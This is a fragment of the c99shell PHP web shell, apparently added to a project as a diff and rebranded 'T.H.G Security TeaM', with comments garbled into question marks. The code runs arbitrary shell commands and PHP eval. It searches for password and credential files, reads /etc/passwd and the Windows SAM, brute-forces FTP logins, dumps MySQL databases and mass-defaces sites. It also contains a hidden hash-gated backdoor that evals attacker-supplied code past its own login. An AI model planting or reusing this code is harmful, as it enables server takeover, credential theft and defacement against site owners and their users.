sgid ????? */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +/* ????? ? ??????? ?????????? ???? ?????? ? sgid ????? */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +/* ????? ?? ??????? ?????? config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +/* ????? ?? ??????? ?????? config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); +/* ????? ? ??????? ?????????? ?????? config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +/* ????? ?? ??????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +/* ????? ? ??????? ?????????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +/* ????? ?? ??????? ?????? service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +/* ????? ? ??????? ?????????? ?????? service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +/* ????? ?? ??????? ?????? .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +/* ????? ? ??????? ?????????? ?????? .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +/* ????? ???? ?????? .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +/* ????? ? ??????? ?????????? ?????? .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +/* ????? ???? ?????? .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +/* ????? ? ??????? ?????????? ?????? .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +/* ????? ?????? ????????? ?????? ?? ???????? ??????? ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +/* ???????? ???????? ?????? */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); + +$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" +$sess_cookie = "c99shvars"; // cookie-variable name + +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."c99shvars_".$sid.".tmp"; + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Delete copied files from buffer after pasting + +//Quick launch +$quicklaunch = array(); +$quicklaunch[] = array("",$surl); +$quicklaunch[] = array("","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("",$surl."act=ls&d=%upd"); +$quicklaunch[] = array("",""); +$quicklaunch[] = array("",$surl."act=search&d=%d"); +$quicklaunch[] = array("",$surl."act=fsbuff&d=%d"); +$quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d"); +$quicklaunch[] = array("Bind",$surl."act=bind&d=%d"); +$quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d"); +$quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d"); +$quicklaunch[] = array("LSA",$surl."act=lsa&d=%d"); +$quicklaunch[] = array("SQL",$surl."act=sql&d=%d"); +$quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d"); +$quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch[] = array("Self remove",$surl."act=selfremove"); +$quicklaunch[] = array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()"); + +//Hignlight-code colors +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; + +@$f = $_GET[f]; + +//END CONFIGURATION + +// \/ Next code not for editing \/ + + +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("
    c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"c99shell\""); + header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit; +} + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "c99shell.php";} + c99sh_getupdate(); + $data = file_get_contents($c99sh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} + else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + $perms = ($mode & 00400) ? "r" : "-"; + $perms .= ($mode & 00200) ? "w" : "-"; + $perms .= ($mode & 00100) ? "x" : "-"; + $perms .= ($mode & 00040) ? "r" : "-"; + $perms .= ($mode & 00020) ? "w" : "-"; + $perms .= ($mode & 00010) ? "x" : "-"; + $perms .= ($mode & 00004) ? "r" : "-"; + $perms .= ($mode & 00002) ? "w" : "-"; + $perms .= ($mode & 00001) ? "x" : "-"; + return $perms; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($c99sh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { + if ($shver < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret[err][] = mysql_error();} + else + { + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { + if (is_dir($d.$f)) + { + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + c99fsearch($d.$f); + } + else + { + if ($true) + { + if (!empty($a[text])) + { + $r = @file_get_contents($d.$f); + if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} + if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + + if ($a[text_regexp]) {$true = ereg($a[text],$r);} + else {$true = strinstr($a[text],$r);} + if ($a[text_not]) + { + if ($true) {$true = false;} + else {$true = true;} + } + if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($handle); +} +} +//Sending headers +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "".$v.""; +} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string","#DD0000"); //#DD0000 + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><? echo $HTTP_HOST; ?> - T.H.G Security TeaM +
    +

    + !PHP Shell v. + !

    Software:  

    uname -a:  

     

    Safe-mode: 

    Directory: "; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "".htmlspecialchars($b)."/"; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = false; + $wdt = "[ Read-Only ]"; + echo "".view_perms(fileperms($d.$f)).""; +} +$free = diskfreespace(realpath($d)); +$all = disk_total_space(realpath($d)); +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "
    Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
    "; +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "".$item[0]."    "; + } +} +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("\\",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":\\")) + { + if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";} + else {$letters .= "[ ".$letter." ] ";} + } + } + if (!empty($letters)) {echo "
    Detected drives: ".$letters;} +} +?>



    "; + if (!$sql_sock) {?>
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword 
    HOSTPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
    +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + if ($sql_db) + { + echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + + $acts = array("","dump"); + + if ($sql_act == "query") + { + echo "
    "; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    SQL-Dump DB:
    "> 
    ";} + if ($sql_act == "newtpl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} + } + elseif ($sql_act == "dump") + { + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "
    "; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size." +  +
    ?
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     
    "; + mysql_free_result($result); + } + } + } + else + { + $acts = array("","newdb","serverstat","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) + { + ?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { + for ($i=0;$i$col_value) {$f .= $col_value;}} + if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } + } + } + } + echo "
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}} + echo "

    "; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if ($win) {echo "This functions not work in Windows!

    ";} + else + { + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + $sock = ftp_connect("localhost",21,1); + if (ftp_login($sock,$str[0],$str[0])) + { + echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\".
    "; + ob_flush(); + $success++; + } + if ($i > $nixpwdperpage) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."

    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + } + } +} +if ($act == "lsa") +{ + echo "
    Server security information:
    "; + echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; + echo "Safe-Mode: ".$hsafemode."
    "; + echo "Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "*nix /etc/passwd:
    "; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."
    ";} + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+.
    ";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else + { + echo "File-System buffer

    "; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using PHP Shell v.".$shver."!"; exit; } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "NO";} + $v[] = "YES"; + shuffle($v); + $v = join("   ",$v); + echo "Self-remove: ".__FILE__."
    Are you sure?
    ".$v."
    "; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( + "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, + "text"=>$text, "text_regexp"=>$text_regxp, + "text_wwo"=>$deface_text_wwo, + "text_cs"=>$deface_text_cs, + "text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {c99fsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $disp_fullpath = true; + $act = $dspact = "ls"; + if 